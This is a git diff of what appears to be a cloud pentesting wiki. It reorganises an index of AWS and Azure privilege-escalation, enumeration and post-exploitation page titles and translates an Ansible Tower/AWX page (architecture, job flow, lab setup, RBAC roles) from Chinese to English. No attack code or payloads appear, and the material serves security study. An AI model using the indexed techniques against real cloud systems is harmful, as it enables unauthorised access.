- [AWS - Organizations Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md)
- [AWS - S3 Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md)
- [AWS - Sagemaker Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md)
- [AWS - Secrets Manager Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md)
- [AWS - SSM Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-ssm-privesc.md)
- [AWS - Step Functions Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-stepfunctions-privesc.md)
- [AWS - STS Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-sts-privesc.md)
- [AWS - WorkDocs Privesc](pentesting-cloud/aws-security/aws-privilege-escalation/aws-workdocs-privesc.md)
- [AWS - Services](pentesting-cloud/aws-security/aws-services/README.md)
- [AWS - Security & Detection Services](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md)
- [AWS - CloudTrail Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md)
@@ -381,7 +335,6 @@
- [AWS - Trusted Advisor Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-trusted-advisor-enum.md)
- [AWS - WAF Enum](pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-waf-enum.md)
- [AWS - API Gateway Enum](pentesting-cloud/aws-security/aws-services/aws-api-gateway-enum.md)
- [AWS - Bedrock Enum](pentesting-cloud/aws-security/aws-services/aws-bedrock-enum.md)
- [AWS - Certificate Manager (ACM) & Private Certificate Authority (PCA)](pentesting-cloud/aws-security/aws-services/aws-certificate-manager-acm-and-private-certificate-authority-pca.md)
- [AWS - CloudFormation & Codestar Enum](pentesting-cloud/aws-security/aws-services/aws-cloudformation-and-codestar-enum.md)
- [AWS - CloudHSM Enum](pentesting-cloud/aws-security/aws-services/aws-cloudhsm-enum.md)
@@ -392,7 +345,7 @@
- [Cognito User Pools](pentesting-cloud/aws-security/aws-services/aws-cognito-enum/cognito-user-pools.md)
- [AWS - DataPipeline, CodePipeline & CodeCommit Enum](pentesting-cloud/aws-security/aws-services/aws-datapipeline-codepipeline-codebuild-and-codecommit.md)
- [AWS - Directory Services / WorkDocs Enum](pentesting-cloud/aws-security/aws-services/aws-directory-services-workdocs-enum.md)
- [AWS - DocumentDB Enum](pentesting-cloud/aws-security/aws-services/aws-documentdb-enum/README.md)
- [AWS - DocumentDB Enum](pentesting-cloud/aws-security/aws-services/aws-documentdb-enum.md)
- [AWS - DynamoDB Enum](pentesting-cloud/aws-security/aws-services/aws-dynamodb-enum.md)
- [AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/README.md)
- [AWS - Nitro Enum](pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md)
@@ -417,7 +370,6 @@
- [AWS - Redshift Enum](pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md)
- [AWS - Relational Database (RDS) Enum](pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md)
- [AWS - Route53 Enum](pentesting-cloud/aws-security/aws-services/aws-route53-enum.md)
- [AWS - SageMaker Enum](pentesting-cloud/aws-security/aws-services/aws-sagemaker-enum/README.md)
- [AWS - Secrets Manager Enum](pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md)
- [AWS - SES Enum](pentesting-cloud/aws-security/aws-services/aws-ses-enum.md)
- [AWS - SNS Enum](pentesting-cloud/aws-security/aws-services/aws-sns-enum.md)
@@ -427,32 +379,31 @@
- [AWS - STS Enum](pentesting-cloud/aws-security/aws-services/aws-sts-enum.md)
- [AWS - Other Services Enum](pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md)
- [AWS - Unauthenticated Enum & Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md)
- [AWS - Accounts Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum/README.md)
- [AWS - API Gateway Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum/README.md)
- [AWS - Cloudfront Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum/README.md)
- [AWS - Cognito Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum/README.md)
- [AWS - CodeBuild Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access/README.md)
- [AWS - DocumentDB Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum/README.md)
- [AWS - DynamoDB Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access/README.md)
- [AWS - EC2 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum/README.md)
- [AWS - ECR Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum/README.md)
- [AWS - ECS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum/README.md)
- [AWS - Elastic Beanstalk Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum/README.md)
- [AWS - Elasticsearch Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum/README.md)
- [AWS - IAM & STS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum/README.md)
- [AWS - Identity Center & SSO Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum/README.md)
- [AWS - IoT Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum/README.md)
- [AWS - Kinesis Video Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum/README.md)
- [AWS - Lambda Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access/README.md)
- [AWS - Media Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum/README.md)
- [AWS - MQ Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum/README.md)
- [AWS - MSK Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum/README.md)
- [AWS - RDS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum/README.md)
- [AWS - Redshift Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum/README.md)
- [AWS - SageMaker Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sagemaker-unauthenticated-enum/README.md)
- [AWS - SQS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum/README.md)
- [AWS - SNS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum/README.md)
- [AWS - S3 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum/README.md)
- [AWS - Accounts Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-accounts-unauthenticated-enum.md)
- [AWS - API Gateway Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-api-gateway-unauthenticated-enum.md)
- [AWS - Cloudfront Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cloudfront-unauthenticated-enum.md)
- [AWS - Cognito Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum.md)
- [AWS - CodeBuild Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-codebuild-unauthenticated-access.md)
- [AWS - DocumentDB Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-documentdb-enum.md)
- [AWS - DynamoDB Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-dynamodb-unauthenticated-access.md)
- [AWS - EC2 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md)
- [AWS - ECR Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md)
- [AWS - ECS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md)
- [AWS - Elastic Beanstalk Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md)
- [AWS - Elasticsearch Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-elasticsearch-unauthenticated-enum.md)
- [AWS - IAM & STS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md)
- [AWS - Identity Center & SSO Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-identity-center-and-sso-unauthenticated-enum.md)
- [AWS - IoT Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-iot-unauthenticated-enum.md)
- [AWS - Kinesis Video Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-kinesis-video-unauthenticated-enum.md)
- [AWS - Lambda Unauthenticated Access](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md)
- [AWS - Media Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-media-unauthenticated-enum.md)
- [AWS - MQ Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md)
- [AWS - MSK Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md)
- [AWS - RDS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md)
- [AWS - Redshift Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-redshift-unauthenticated-enum.md)
- [AWS - SQS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md)
- [AWS - SNS Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md)
- [AWS - S3 Unauthenticated Enum](pentesting-cloud/aws-security/aws-unauthenticated-enum-access/aws-s3-unauthenticated-enum.md)
- [Azure Pentesting](pentesting-cloud/azure-security/README.md)
- [Az - Basic Information](pentesting-cloud/azure-security/az-basic-information/README.md)
- [Az Federation Abuse](pentesting-cloud/azure-security/az-basic-information/az-federation-abuse.md)
@@ -468,12 +419,10 @@
- [Az - Services](pentesting-cloud/azure-security/az-services/README.md)
- [Az - Entra ID (AzureAD) & Azure IAM](pentesting-cloud/azure-security/az-services/az-azuread.md)
- [Az - ACR](pentesting-cloud/azure-security/az-services/az-acr.md)
- [Az - API Management](pentesting-cloud/azure-security/az-services/az-api-management.md)
- [Az - Application Proxy](pentesting-cloud/azure-security/az-services/az-application-proxy.md)
- [Az - ARM Templates / Deployments](pentesting-cloud/azure-security/az-services/az-arm-templates.md)
- [Az - Automation Accounts](pentesting-cloud/azure-security/az-services/az-automation-accounts.md)
- [Az - Azure App Services](pentesting-cloud/azure-security/az-services/az-app-services.md)
- [Az - AI Foundry](pentesting-cloud/azure-security/az-services/az-ai-foundry.md)
- [Az - Cloud Shell](pentesting-cloud/azure-security/az-services/az-cloud-shell.md)
- [Az - Container Registry](pentesting-cloud/azure-security/az-services/az-container-registry.md)
- [Az - Container Instances, Apps & Jobs](pentesting-cloud/azure-security/az-services/az-container-instances-apps-jobs.md)
@@ -509,7 +458,6 @@
- [Az - Domain Services](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.md)
- [Az - Federation](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-federation.md)
- [Az - Hybrid Identity Misc Attacks](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-hybrid-identity-misc-attacks.md)
- [Az - Exchange Hybrid Impersonation (ACS Actor Tokens)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-exchange-hybrid-impersonation.md)
- [Az - Local Cloud Credentials](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-local-cloud-credentials.md)
- [Az - Pass the Certificate](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-certificate.md)
- [Az - Pass the Cookie](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pass-the-cookie.md)
@@ -517,7 +465,6 @@
- [Az - PTA - Pass-through Authentication](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-pta-pass-through-authentication.md)
- [Az - Seamless SSO](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-seamless-sso.md)
- [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md)
- [Az API Management Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-api-management-post-exploitation.md)
- [Az Azure Ai Foundry Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-azure-ai-foundry-post-exploitation.md)
- [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md)
- [Az - CosmosDB Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-cosmosDB-post-exploitation.md)
@@ -535,8 +482,6 @@
- [Az - VMs & Network Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md)
- [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md)
- [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md)
- [Az - AI Foundry Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-ai-foundry-privesc.md)
- [Az - API Management Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-api-management-privesc.md)
- [Az - App Services Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md)
- [Az - Automation Accounts Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-automation-accounts-privesc.md)
- [Az - Container Registry Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-container-registry-privesc.md)

View File

@@ -1,14 +1,18 @@
> [!TIP]
> 学习并练习 AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> 学习并练习 GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> 学习并练习 Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Learn & practice AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Learn & practice GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Learn & practice Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>支持 HackTricks</summary>
> <summary>Support HackTricks</summary>
>
> - 查看 [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **加入** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) 或者 [**telegram group**](https://t.me/peass) **关注** 我们的 **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库 提交 PRs 来分享 hacking tricks。
> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>

BIN
src/files/empty.zip Normal file

Binary file not shown.

BIN
src/pdfs/AWS_Services.pdf Normal file

Binary file not shown.

View File

@@ -2,61 +2,62 @@
{{#include ../banners/hacktricks-training.md}}
## 基本信息
## Basic Information
**Ansible Tower** 或其开源版本 [**AWX**](https://github.com/ansible/awx) 也被称为 **Ansible 的用户界面、仪表板和 REST API**。通过 **基于角色的访问控制**、作业调度和图形化库存管理,您可以通过现代用户界面管理您的 Ansible 基础设施。Tower REST API 和命令行界面使其易于集成到当前工具和工作流程中。
**Ansible Tower** or it's opensource version [**AWX**](https://github.com/ansible/awx) is also known as **Ansibles user interface, dashboard, and REST API**. With **role-based access control**, job scheduling, and graphical inventory management, you can manage your Ansible infrastructure from a modern UI. Towers REST API and command-line interface make it simple to integrate it into current tools and workflows.
**Automation Controller 是 Ansible Tower 的一个更新版本,具有更多功能。**
**Automation Controller is a newer** version of Ansible Tower with more capabilities.
### 差异
### Differences
根据 [**这篇文章**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00)Ansible Tower AWX 之间的主要区别在于获得的支持Ansible Tower 具有额外的功能,如基于角色的访问控制、对自定义 API 的支持和用户定义的工作流。
According to [**this**](https://blog.devops.dev/ansible-tower-vs-awx-under-the-hood-65cfec78db00), the main differences between Ansible Tower and AWX is the received support and the Ansible Tower has additional features such as role-based access control, support for custom APIs, and user-defined workflows.
### 技术栈
### Tech Stack
- **Web 界面**:这是用户可以管理库存、凭据、模板和作业的图形界面。它旨在直观,并提供可视化以帮助理解自动化作业的状态和结果。
- **REST API**:您可以在 Web 界面中执行的所有操作,也可以通过 REST API 执行。这意味着您可以将 AWX/Tower 与其他系统集成或编写通常在界面中执行的操作脚本。
- **数据库**AWX/Tower 使用数据库(通常是 PostgreSQL来存储其配置、作业结果和其他必要的操作数据。
- **RabbitMQ**:这是 AWX/Tower 用于在不同组件之间通信的消息系统,特别是在 Web 服务和任务运行器之间。
- **Redis**Redis 作为缓存和任务队列的后端。
- **Web Interface**: This is the graphical interface where users can manage inventories, credentials, templates, and jobs. It's designed to be intuitive and provides visualizations to help with understanding the state and results of your automation jobs.
- **REST API**: Everything you can do in the web interface, you can also do via the REST API. This means you can integrate AWX/Tower with other systems or script actions that you'd typically perform in the interface.
- **Database**: AWX/Tower uses a database (typically PostgreSQL) to store its configuration, job results, and other necessary operational data.
- **RabbitMQ**: This is the messaging system used by AWX/Tower to communicate between the different components, especially between the web service and the task runners.
- **Redis**: Redis serves as a cache and a backend for the task queue.
### 逻辑组件
### Logical Components
- **库存**:库存是一个 **主机(或节点)的集合**,可以对其 **运行作业**Ansible playbooks。AWX/Tower 允许您定义和分组库存,并支持动态库存,可以 **从其他系统获取主机列表**,如 AWSAzure 等。
- **项目**:项目本质上是一个 **Ansible playbooks 的集合**,来源于 **版本控制系统**(如 Git以便在需要时提取最新的 playbooks。
- **模板**:作业模板定义 **特定 playbook 的运行方式**,指定 **库存**、**凭据** 和其他 **参数**
- **凭据**AWX/Tower 提供了一种安全的方式来 **管理和存储秘密,如 SSH 密钥、密码和 API 令牌**。这些凭据可以与作业模板关联,以便在运行时为 playbooks 提供必要的访问权限。
- **任务引擎**:这是魔法发生的地方。任务引擎基于 Ansible 构建,负责 **运行 playbooks**。作业被分派到任务引擎,然后使用指定的凭据在指定的库存上运行 Ansible playbooks。
- **调度程序和回调**:这些是 AWX/Tower 中的高级功能,允许 **作业在特定时间调度运行**或由外部事件触发。
- **通知**AWX/Tower 可以根据作业的成功或失败发送通知。它支持多种通知方式如电子邮件、Slack 消息、webhooks 等。
- **Ansible Playbooks**Ansible playbooks 是配置、部署和编排工具。它们以自动化、可重复的方式描述系统的期望状态。使用 YAML 编写,playbooks 使用 Ansible 的声明性自动化语言来描述需要执行的配置、任务和步骤。
- **Inventories**: An inventory is a **collection of hosts (or nodes)** against which **jobs** (Ansible playbooks) can be **run**. AWX/Tower allows you to define and group your inventories and also supports dynamic inventories which can **fetch host lists from other systems** like AWS, Azure, etc.
- **Projects**: A project is essentially a **collection of Ansible playbooks** sourced from a **version control system** (like Git) to pull the latest playbooks when needed..
- **Templates**: Job templates define **how a particular playbook will be run**, specifying the **inventory**, **credentials**, and other **parameters** for the job.
- **Credentials**: AWX/Tower provides a secure way to **manage and store secrets, such as SSH keys, passwords, and API tokens**. These credentials can be associated with job templates so that playbooks have the necessary access when they run.
- **Task Engine**: This is where the magic happens. The task engine is built on Ansible and is responsible for **running the playbooks**. Jobs are dispatched to the task engine, which then runs the Ansible playbooks against the designated inventory using the specified credentials.
- **Schedulers and Callbacks**: These are advanced features in AWX/Tower that allow **jobs to be scheduled** to run at specific times or triggered by external events.
- **Notifications**: AWX/Tower can send notifications based on the success or failure of jobs. It supports various means of notifications such as emails, Slack messages, webhooks, etc.
- **Ansible Playbooks**: Ansible playbooks are configuration, deployment, and orchestration tools. They describe the desired state of systems in an automated, repeatable way. Written in YAML, playbooks use Ansible's declarative automation language to describe configurations, tasks, and steps that need to be executed.
### 作业执行流程
### Job Execution Flow
1. **用户交互**:用户可以通过 **Web 界面****REST API** 与 AWX/Tower 交互。这些提供了对 AWX/Tower 所有功能的前端访问。
2. **作业启动**
- 用户通过 Web 界面或 API根据 **作业模板** 启动作业。
- 作业模板包括对 **库存**、**项目**(包含 playbook**凭据** 的引用。
- 在作业启动时,向 AWX/Tower 后端发送请求以将作业排队执行。
3. **作业排队**
- **RabbitMQ** 处理 Web 组件与任务运行器之间的消息传递。一旦作业启动,消息将通过 RabbitMQ 发送到任务引擎。
- **Redis** 作为任务队列的后端,管理等待执行的排队作业。
4. **作业执行**
- **任务引擎** 拾取排队的作业。它从 **数据库** 中检索与作业相关的 playbook、库存和凭据的必要信息。
- 使用从相关 **项目** 中检索的 Ansible playbook任务引擎在指定的 **库存** 节点上使用提供的 **凭据** 运行 playbook。
- playbook 运行时,其执行输出(日志、事实等)被捕获并存储在 **数据库** 中。
5. **作业结果**
- 一旦 playbook 运行完成,结果(成功、失败、日志)将保存到 **数据库** 中。
- 用户可以通过 Web 界面查看结果或通过 REST API 查询结果。
- 根据作业结果,可以发送 **通知** 以告知用户或外部系统作业的状态。通知可以是电子邮件、Slack 消息、webhooks 等。
6. **外部系统集成**
- **库存** 可以从外部系统动态获取,允许 AWX/Tower 从 AWSAzureVMware 等来源提取主机。
- **项目**playbooks可以从版本控制系统中获取确保在作业执行期间使用最新的 playbooks。
- **调度程序和回调** 可用于与其他系统或工具集成,使 AWX/Tower 对外部触发器做出反应或在预定时间运行作业。
1. **User Interaction**: A user can interact with AWX/Tower either through the **Web Interface** or the **REST API**. These provide front-end access to all the functionalities offered by AWX/Tower.
2. **Job Initiation**:
- The user, via the Web Interface or API, initiates a job based on a **Job Template**.
- The Job Template includes references to the **Inventory**, **Project** (containing the playbook), and **Credentials**.
- Upon job initiation, a request is sent to the AWX/Tower backend to queue the job for execution.
3. **Job Queuing**:
- **RabbitMQ** handles the messaging between the web component and the task runners. Once a job is initiated, a message is dispatched to the task engine using RabbitMQ.
- **Redis** acts as the backend for the task queue, managing queued jobs awaiting execution.
4. **Job Execution**:
- The **Task Engine** picks up the queued job. It retrieves the necessary information from the **Database** about the job's associated playbook, inventory, and credentials.
- Using the retrieved Ansible playbook from the associated **Project**, the Task Engine runs the playbook against the specified **Inventory** nodes using the provided **Credentials**.
- As the playbook runs, its execution output (logs, facts, etc.) gets captured and stored in the **Database**.
5. **Job Results**:
- Once the playbook finishes running, the results (success, failure, logs) are saved to the **Database**.
- Users can then view the results through the Web Interface or query them via the REST API.
- Based on job outcomes, **Notifications** can be dispatched to inform users or external systems about the job's status. Notifications could be emails, Slack messages, webhooks, etc.
6. **External Systems Integration**:
- **Inventories** can be dynamically sourced from external systems, allowing AWX/Tower to pull in hosts from sources like AWS, Azure, VMware, and more.
- **Projects** (playbooks) can be fetched from version control systems, ensuring the use of up-to-date playbooks during job execution.
- **Schedulers and Callbacks** can be used to integrate with other systems or tools, making AWX/Tower react to external triggers or run jobs at predetermined times.
### AWX 实验室创建以进行测试
### AWX lab creation for testing
[**Following the docs**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) it's possible to use docker-compose to run AWX:
[**按照文档**](https://github.com/ansible/awx/blob/devel/tools/docker-compose/README.md) 可以使用 docker-compose 运行 AWX
```bash
git clone -b x.y.z https://github.com/ansible/awx.git # Get in x.y.z the latest release version
@@ -82,78 +83,79 @@ docker exec -ti tools_awx_1 awx-manage createsuperuser
# Load demo data
docker exec tools_awx_1 awx-manage create_preload_data
```
## RBAC
### 支持的角色
### Supported roles
最特权的角色称为 **System Administrator**。拥有此角色的任何人都可以 **修改任何内容**
The most privileged role is called **System Administrator**. Anyone with this role can **modify anything**.
**白盒安全** 审查的角度来看,您需要 **System Auditor role**,该角色允许 **查看所有系统数据** 但不能进行任何更改。另一个选择是获取 **Organization Auditor role**,但获取前者会更好。
From a **white box security** review, you would need the **System Auditor role**, which allow to **view all system data** but cannot make any changes. Another option would be to get the **Organization Auditor role**, but it would be better to get the other one.
<details>
<summary>展开以获取可用角色的详细描述</summary>
<summary>Expand this to get detailed description of available roles</summary>
1. **System Administrator**:
- 这是具有访问和修改系统中任何资源权限的超级用户角色。
- 他们可以管理所有组织、团队、项目、库存、作业模板等。
- This is the superuser role with permissions to access and modify any resource in the system.
- They can manage all organizations, teams, projects, inventories, job templates, etc.
2. **System Auditor**:
- 拥有此角色的用户可以查看所有系统数据,但不能进行任何更改。
- 此角色旨在用于合规性和监督。
- Users with this role can view all system data but cannot make any changes.
- This role is designed for compliance and oversight.
3. **Organization Roles**:
- **Admin**: 对组织资源的完全控制。
- **Auditor**: 对组织资源的只读访问。
- **Member**: 在组织中的基本成员身份,没有任何特定权限。
- **Execute**: 可以在组织内运行作业模板。
- **Read**: 可以查看组织的资源。
- **Admin**: Full control over the organization's resources.
- **Auditor**: View-only access to the organization's resources.
- **Member**: Basic membership in an organization without any specific permissions.
- **Execute**: Can run job templates within the organization.
- **Read**: Can view the organizations resources.
4. **Project Roles**:
- **Admin**: 可以管理和修改项目。
- **Use**: 可以在作业模板中使用该项目。
- **Update**: 可以使用 SCM源控制更新项目。
- **Admin**: Can manage and modify the project.
- **Use**: Can use the project in a job template.
- **Update**: Can update project using SCM (source control).
5. **Inventory Roles**:
- **Admin**: 可以管理和修改库存。
- **Ad Hoc**: 可以在库存上运行临时命令。
- **Update**: 可以更新库存源。
- **Use**: 可以在作业模板中使用库存。
- **Read**: 只读访问。
- **Admin**: Can manage and modify the inventory.
- **Ad Hoc**: Can run ad hoc commands on the inventory.
- **Update**: Can update the inventory source.
- **Use**: Can use the inventory in a job template.
- **Read**: View-only access.
6. **Job Template Roles**:
- **Admin**: 可以管理和修改作业模板。
- **Execute**: 可以运行作业。
- **Read**: 只读访问。
- **Admin**: Can manage and modify the job template.
- **Execute**: Can run the job.
- **Read**: View-only access.
7. **Credential Roles**:
- **Admin**: 可以管理和修改凭据。
- **Use**: 可以在作业模板或其他相关资源中使用凭据。
- **Read**: 只读访问。
- **Admin**: Can manage and modify the credentials.
- **Use**: Can use the credentials in job templates or other relevant resources.
- **Read**: View-only access.
8. **Team Roles**:
- **Member**: 团队的一部分,但没有任何特定权限。
- **Admin**: 可以管理团队成员和相关资源。
- **Member**: Part of the team but without any specific permissions.
- **Admin**: Can manage the team's members and associated resources.
9. **Workflow Roles**:
- **Admin**: 可以管理和修改工作流。
- **Execute**: 可以运行工作流。
- **Read**: 只读访问。
- **Admin**: Can manage and modify the workflow.
- **Execute**: Can run the workflow.
- **Read**: View-only access.
</details>
## 使用 AnsibleHound 进行枚举和攻击路径映射
